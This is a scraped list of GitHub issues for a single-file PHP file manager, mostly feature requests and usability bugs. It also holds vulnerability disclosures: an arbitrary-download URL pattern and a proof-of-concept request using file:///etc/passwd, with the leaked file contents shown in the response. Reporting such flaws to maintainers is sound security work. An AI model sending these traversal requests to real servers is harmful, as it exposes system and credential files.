jcampbell1 / simple-file-manager Goto Github PK
View Code? Open in Web Editor NEWA Simple PHP file manager. The code is a single php file.
License: MIT License
A Simple PHP file manager. The code is a single php file.
License: MIT License
I found this bug in a fork of this software. It allows every registed user to download any file at the webserver root.
<YOURPAGE>/index.php?do=download&file=index.php
I think you should add a check if the filetype is allowed. Otherwise it's possible to download the index.php file and follow each include until you reach something interesting
https://github.com/jcampbell1/simple-file-manager/blob/master/index.php#L113
I think it will be a good idea to hide "Create new folder" menu, if "$allow_create_folder = false;" is set.
Feature request for a future version. I'd love to have a config for hiding certain files, extensions or folders from the files list.
Is it possible to get file modified date as a default file orderind instead of file name ordering?
Any news about search feature?
Thank you and best regards.
Fernando Grimmer.
First of all - great tool, thanks for creating it.
The problem I have is that directories whose name contain a plus character cannot be listed. This is the error response:
{"error":{"code":412,"msg":"Not a Directory"}}
However files whose filename contain a + can be downloaded without any problem.
Add possibility to edit files ? (php, html, css, txt, md)
Add confirm before Delete ? (My mouse can be nervous !)
Great app for beginners by the way
Cordialy - nib
There really needs to be some way to change/configure the working directory. This is a really awesome system, however it's use is very limited without the ability to choose where the "home" directory is. This is definitely on my watch list, but I can't use it until there is some kind of feature allowing me to change the directory.
Hi, is there a simple way to hide subdirectories from listing?
I ran this class on php5, it works but there is only one thing, that it has some errors "Undefined variable", I solved this problem by using isset(), to all the $REQUEST $POST variable.
Thanks,
could be very great if can upload form url
It is possible to extract sensitive information from the server when downloading a file. When altering the download request with the PHP file:/// extension fitter it is possible to download files outside the root folder. Find the PoC below.
Request send
GET /index.php/?do=download&file=file:///etc/passwd HTTP/1.1
Host: 127.0.0.1
Request received
HTTP/1.1 200 OK
Date: Fri, 14 Sep 2018 11:27:37 GMT
Server: Apache/2.4.34 (Debian)
Set-Cookie: _sfm_xsrf=82b713d531811279f4b62e02b3f54a7d
Content-Length: 3142
Content-Disposition: attachment; filename="passwd"
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
Can you add a feature which allows me to set the default folder so it could be another folder other than the same on as the file is in as i would like to save files that my users upload into a file called folder which is at ./user/files/$_SESSION['UserName']/ where as my file browser is at ./user/dashboard/filemanager
Hi
On my file link, a dont have a right URL !!
I have : http://myServ/DD/timelaps%2FGMTimelaps%2Fcloud.pi0.253.vendredi.speed.mp4
But I need http://myServ/DD/timelaps/GMTimelaps/cloud.pi0.253.vendredi.speed.mp4
My root directory is DD/timelaps.
Do you have some idéea ?
G.
a Rename feature is really necessary... and a Search feature would be nice too... not to mention, a Drag and Move feature would pretty much complete this simple file manager !!
also, thanks for this script, simple and awesome at the same time !!!
Zip folder and download IT.
The file manager page loads properly from Windows browsers (tried Google Chrome and Firefox) and has no problem loading from my Samsung tablet using Android V6.1 (Marshmallow) using Samsung Internet Explorer, Google Chrome and Firefox.
But when I try loading it from another Samsung tablet using Android V7.0 (Nougat), nothing loads. Only a blue bar appears, but nothing else loads.
As I was trying different things with it to narrow down the problem, I added a password and some PHP echo lines in the body, I get asked for the password but the PHP echo lines and other javascript commands are not executing. As if the tablet does not allow the javascrips and PHP lines to be executed. The changes are visible from windows browsers and Marshmallow tablet.
Any suggestions?
The Script Works Fine On Home, But When U GO To A Directory It Doesn't Show The Files Inside Of It
But There Is No Issue For My Friend, Only For Me
Here Is The Example
This Won't Work
http://besoeasy.com/data/#[JulesJordan]%20Abella%20Anderson%20%28Anal%20Cruising%20South%20Beach%29%20[XXX]%20x264
This WIll
Please try to implement bulk select and operation like delete, move, copy.
Hello,
Can someone please help me solve this server error. The error happens when I try to download any file from the server to the desktop when using the Chrome browser. The line where the error is happening is 116. I guess I am missing something here, but I don't know what it is.
116: header('Content-Type: ' . mime_content_type($file));
When I use the Firefox browser, I just get a blank page with nothing in it.
It doesn't list nothing when there is a folder with special characters like á, é, ã, õ...
Just "crashes". No php errors. Only say "Uncaught TypeError: $(...).tablesorter is not a function
jquery.min.js:16 Uncaught TypeError: Cannot read property 'success' of null".
Hello,
I don't use it now but before installation I would like to know :
Can I rename files and folde?
Two Feature Requests
Rename
Edit
thx
how to change the working directory
I have the following structure:
/
/ admin - here's the simple-file-manager
/ images - here are the files it should manage.
Where do I change the working path of the script?
Please tell me how to remove the delete function also with the delete button on index.php
HI, I find it (simple-file-manager) very simple and useful, thank you.
One I missing feature is recursive upload.
It is much simple and useful, if it support drag directory to recursively upload.
Thank you and your nice software.
I'd Like to disable file uploading for users and simply not show the thing at the the top. How would I do so.
I upload a file, but show the tips of 'exceeds max upload size of 2.0 MB',
so how to remove restrictions of the max upload size ?
There are already the arrays $disallowed_extensions
and $hidden_extensions
which allow blacklisting showing or uploading extensions. But I want to show files of only one type, so it's easier for me to just give the list of the extensions that I allow instead of the ones that I disallow.
Can u add a function for following Symlinks?
I added my Usb drive with a symlink to my www dir and i cant open the directory.
Dear Nico
Hi,
Delete button doesn't seem to work on IE 11. When click on it nothing happens.
The link # is not understood by IE, maybe need to change for a form?
Am I missing something here?
I don't see how one is supposed to upload any files. Dragging items into the page doesn't seem to do anything either, and there are no javascript errors in the console or any scripts that failed to download. Tried with latest Chrome and Firefox, no difference. This is using the latest master source, and $allow_upload
is set to true per the default.
after host it error log show, this line has an error then error_log file show in file manager
header('Content-Type: ' . mime_content_type($file));
@jcampbell1 Also, Please check your Gmail inbox
Hello,
thank you much for your utility.
Please consider, especially on large dir to avoid a refresh and rescrolling, to allow to delete more than one file in one operation (ie. mark multiple files and then delete button).
thanks you much
Thanks for great code.
This works perfectly on my home server.
No issues on firefox, but it does not move to unicode directory on iphone.
For example, the name of directory is correctly shown as following.
Home > 유니코드
but iphone shows as following
Home > %EC%95%82....
and no file is shown.
Forked here - https://github.com/xcartmods/simple-file-manager
you can implement the transition to the root directory ".."
For example, file simple-file-manager(inidex.php) is in the directory "file_manager" and you need to return to the level above.
index.php
line 434
replace
<?php if($allow_upload == true): ?>
with
<?php if($allow_create_folder == true): ?>
I have the following problem: On my server, I have multiple instances of index.php each of which have different passwords. But when I log in into one of them, the server also lets me log in into all the others although I might not know their passwords. This is a security bug if I use multiple instances of index.php.
First time user, I would like to use SFM for an admin page.
When I launch the file I get Failed to load resource: the server responded with a status of 403 (Forbidden)
{"error":{"code":403,"msg":"XSRF Failure"}}
What could this be please ?
Is there a setup tutorial somewhere ? The information provided on the Github page are not enough for me to understand. It only says to copy the index.php file
I am enjoying this code and using it in conjunction with IFM.
However, I have two feature requests:
Thanks!
I can create/delete UTF8/Chinese directory, but can not change to it.
I setup the test account
https://file.wonghome.net/test/
Hi,
When uploading from IE on Win10, upload is fine but nothing happen on the page.
User needs to refresh the page manually to see the newly uploaded file.
I will be thankful if you provide me same code using object-oriented approach.
Hi, I'm working on OS X and I'd like to hide .DS_Strore file, I've tried in hidden extensions settings with ''(empty) but doesn't work. Thanks in advance.
hi
I added language support by the following changes:
Thank you for this nice work!
I checked and found a problem in line 434, should be $allow_create_folder instead $aloow_upload.
Just a note that if the file manager directory is not writeable (ie. the web server does not have permission to write to the directory/folder) there is no explanation, the upload box just disappears. It took me a few minutes to work this out.
Would be more user friendly to add an informational message if the directory/folder is not writeable so as not to confuse the new user.
here is comprehensive PHP file manager.
Add those functions to your filemanager too.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.